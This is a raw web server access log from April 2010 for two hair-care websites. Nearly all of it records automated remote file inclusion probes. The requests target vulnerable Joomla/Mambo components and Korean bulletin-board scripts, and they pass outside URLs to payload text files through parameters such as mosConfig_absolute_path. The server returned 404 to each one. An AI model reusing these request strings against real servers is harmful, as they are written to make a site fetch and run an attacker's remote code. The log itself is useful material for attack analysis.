88.191.94.188 - - [19/Apr/2010:09:38:26 -0700] "GET /logs/access_100405.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.53.131.149 - - [19/Apr/2010:09:39:22 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)" "www.freehairsecrets.com"
208.53.131.149 - - [19/Apr/2010:09:39:23 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:09:40:05 -0700] "GET /zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:05 -0700] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:06 -0700] "GET /logs/access.log%20%20//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:25 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:25 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:25 -0700] "GET /logs/access_100412.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:28 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:28 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:29 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:32 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:32 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:37 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:38 -0700] "GET /zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:41 -0700] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:41 -0700] "GET /logs/access.log%20%20//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:40:43 -0700] "GET /logs/access_100412.log%20%20//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:41:07 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:41:07 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:41:09 -0700] "GET /logs/access_100412.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:41:34 -0700] "GET /logs/access_100412.log%20%20//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:09:42:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [19/Apr/2010:09:42:39 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [19/Apr/2010:09:42:39 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.107.104.82 - - [19/Apr/2010:09:43:08 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "freehairsecrets.com"
89.107.104.82 - - [19/Apr/2010:09:43:09 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:09:43:51 -0700] "GET /logs/access.log//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:45:57 -0700] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:09:45:57 -0700] "GET /zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:09:46:03 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:46:03 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:46:03 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:46:04 -0700] "GET /logs/access.log//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:09:46:16 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:46:16 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:09:46:21 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [19/Apr/2010:09:50:14 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [19/Apr/2010:09:50:14 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [19/Apr/2010:09:50:14 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [19/Apr/2010:09:50:47 -0700] "GET /logs/access_100412.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [19/Apr/2010:09:50:47 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [19/Apr/2010:09:50:47 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:56:17 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:56:17 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:56:17 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:56:22 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:56:22 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:56:22 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:57:49 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:57:49 -0700] "GET /logs/access_100308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.59.2.84 - - [19/Apr/2010:09:57:49 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [19/Apr/2010:10:04:51 -0700] "GET /logs/access_100412.log%20%20//write_update.php?board_skin_path=http://www.fkaco.com/OshellPhoto2009Koreanday/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [19/Apr/2010:10:04:51 -0700] "GET /logs//write_update.php?board_skin_path=http://www.fkaco.com/OshellPhoto2009Koreanday/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [19/Apr/2010:10:04:51 -0700] "GET /write_update.php?board_skin_path=http://www.fkaco.com/OshellPhoto2009Koreanday/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [19/Apr/2010:10:05:09 -0700] "GET /write_update.php?board_skin_path=http://www.fkaco.com/OshellPhoto2009Koreanday/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [19/Apr/2010:10:05:09 -0700] "GET /logs//write_update.php?board_skin_path=http://www.fkaco.com/OshellPhoto2009Koreanday/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [19/Apr/2010:10:05:09 -0700] "GET /logs/access_100412.log%20%20//write_update.php?board_skin_path=http://www.fkaco.com/OshellPhoto2009Koreanday/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [19/Apr/2010:10:09:05 -0700] "GET /logs/access_100412.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [19/Apr/2010:10:09:05 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [19/Apr/2010:10:09:05 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:14:57 -0700] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:14:57 -0700] "GET /logs/access_091123.log%20%20////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:00 -0700] "GET /logs////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:12 -0700] "GET /logs////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:12 -0700] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:13 -0700] "GET /logs/access_091123.log////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:14 -0700] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:14 -0700] "GET /logs////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:14 -0700] "GET /logs/access_091123.log////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [19/Apr/2010:10:15:24 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:15:24 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:15:24 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:10:15:25 -0700] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:25 -0700] "GET /logs/access_091123.log%20%20////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:15:26 -0700] "GET /logs////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [19/Apr/2010:10:17:04 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.216.43.133 - - [19/Apr/2010:10:17:04 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.216.43.133 - - [19/Apr/2010:10:17:04 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.216.43.133 - - [19/Apr/2010:10:17:31 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.216.43.133 - - [19/Apr/2010:10:17:31 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.216.43.133 - - [19/Apr/2010:10:17:32 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:19:20 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:19:21 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:19:21 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.52.56 - - [19/Apr/2010:10:19:49 -0700] "GET /logs/access_100412.log//skin/zero_vote/ask_password.php?dir=http://janosz.iswift.eu/.data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
94.136.52.56 - - [19/Apr/2010:10:19:51 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://janosz.iswift.eu/.data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
94.136.52.56 - - [19/Apr/2010:10:19:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://janosz.iswift.eu/.data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
205.234.252.102 - - [19/Apr/2010:10:19:58 -0700] "GET /logs/access_100308.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [19/Apr/2010:10:19:58 -0700] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [19/Apr/2010:10:19:58 -0700] "GET /bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [19/Apr/2010:10:21:09 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:21:09 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:21:31 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.234.252.102 - - [19/Apr/2010:10:21:51 -0700] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [19/Apr/2010:10:21:51 -0700] "GET /bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [19/Apr/2010:10:21:51 -0700] "GET /logs/access_100308.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.83 - - [19/Apr/2010:10:22:18 -0700] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:10:22:21 -0700] "GET /logs////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:10:22:21 -0700] "GET /logs/access_091130.log////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:10:22:24 -0700] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:10:22:24 -0700] "GET /logs////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.162.83 - - [19/Apr/2010:10:22:24 -0700] "GET /logs/access_091130.log////bbs//skin/zero_vote/ask_password.php?dir=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [19/Apr/2010:10:22:25 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
